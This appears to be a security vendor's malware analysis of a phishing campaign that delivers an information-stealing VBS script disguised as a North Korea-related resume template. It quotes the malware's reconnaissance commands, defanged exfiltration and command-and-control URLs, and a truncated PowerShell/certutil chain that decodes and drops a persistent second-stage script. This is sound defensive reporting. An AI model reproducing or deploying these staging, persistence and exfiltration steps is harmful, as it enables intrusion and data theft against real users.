The ASEC analysis team has recently discovered that a malicious info-leaking VBS is being distributed via phishing email disguised as North Korea-related material. The email is about casting calls for a North Korea-related broadcast, and a compressed file is attached to it. It asks the readers to fill out the resume, prompting them to run the file. The compressed file contains a malicious VBS script file.
The activities of ‘2022 Resume Template.vbs’ are as follows:
- Collects and sends information
- Creates a normal HWP file
- Creates additional malicious script files and registers to task scheduler
When the VBS file is run, it collects user PC information using the commands below.
|List of currently running processes||cmd /c tasklist /v | clip|
|Routing table information||cmd /c Route print | clip|
|Program Files folder information||cmd /c dir /w “”%SystemRoot%/../Program Files”” | clip|
|Program Files (x86) folder information||cmd /c dir /w “”%SystemRoot%/../Program Files (x86)”” | clip|
It then encodes the collected information with Base64 and sends it to hxxp://fserverone.webcindario[.]com/contri/sqlite/msgbugPlog.php.
- Parameter value: Cache=error&Sand=[Username]&Data=[Collected information encoded with base64]&Em=[Username encoded with base64]
It also uses ‘2022.hwp’ command to run the HWP file created in the folder where ‘2022 Resume Template.vbs’ file was run to disguise it as a normal file. The HWP file contains a resume template as shown below.
It then uses powershell to run the data existing in the response received from the URL the information was sent to. It also registers %appdata%\mscornet.vbs file that was created from the response to task scheduler as Google Update Source Link. Furthermore, it copies mscornet.vbs to the Startup folder so that the VBS file can be run automatically, then self-deletes ‘2022 Resume Template.vbs.’
Although no special responses can currently be received from hxxp://fserverone.webcindario[.]com/contri/sqlite/msgbugPlog.php (the destination of sent information), additional commands exist in the received response recorded in AhnLab’s automatic analysis system RAPIT (Confirmed on March 26th).
In the response message, it uses powershell to save the data encoded with base64 in %AppData%\~KB3241.tmp. It then decodes ~Kb3241.tmp to save it as %AppData%\mscornet.vbs and deletes ~KB3241.tmp.
powershell -w hidden ECHO OFF echo RnVuY3Rpb24gaDJzKGgpDQogIERpbSBhIDogYSA9IFNwbGl0KGgpDQogIERpbSBp > "%AppData%\~KB3241.tmp" echo DQogIEZvciBpID0gMCBUbyBVQm91bmQoYSkNCiAgICAgIGEoaSkgPSBDaHIoIiYi >> "%AppData%\~KB3241.tmp" <omitted> echo ZSINCmtpbGxQcm9jZXNzICJpZWxvd3V0aWwuZXhlIg== >> "%AppData%\~KB3241.tmp" certutil -f -decode "%AppData%\~KB3241.tmp" "%AppData%\mscornet.vbs" del "%AppData%\~KB3241.tmp"
mscornet.vbs accesses hxxp://cmaildowninvoice.webcindario[.]com/contri/sqlite/msgbugGlog.php?Cache=fail&Sand=[PC name] and runs the received response with Execute command. No additional commands can be seen from the URL, but it can be made to perform various malicious behaviors by the attacker.
Users must remain vigilant as malware disguised with North Korea-related materials are recently being distributed via Word files as well as in the form of VBS script.
AhnLab’s anti-malware software, V3, is currently detecting and blocking the files using the following aliases.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.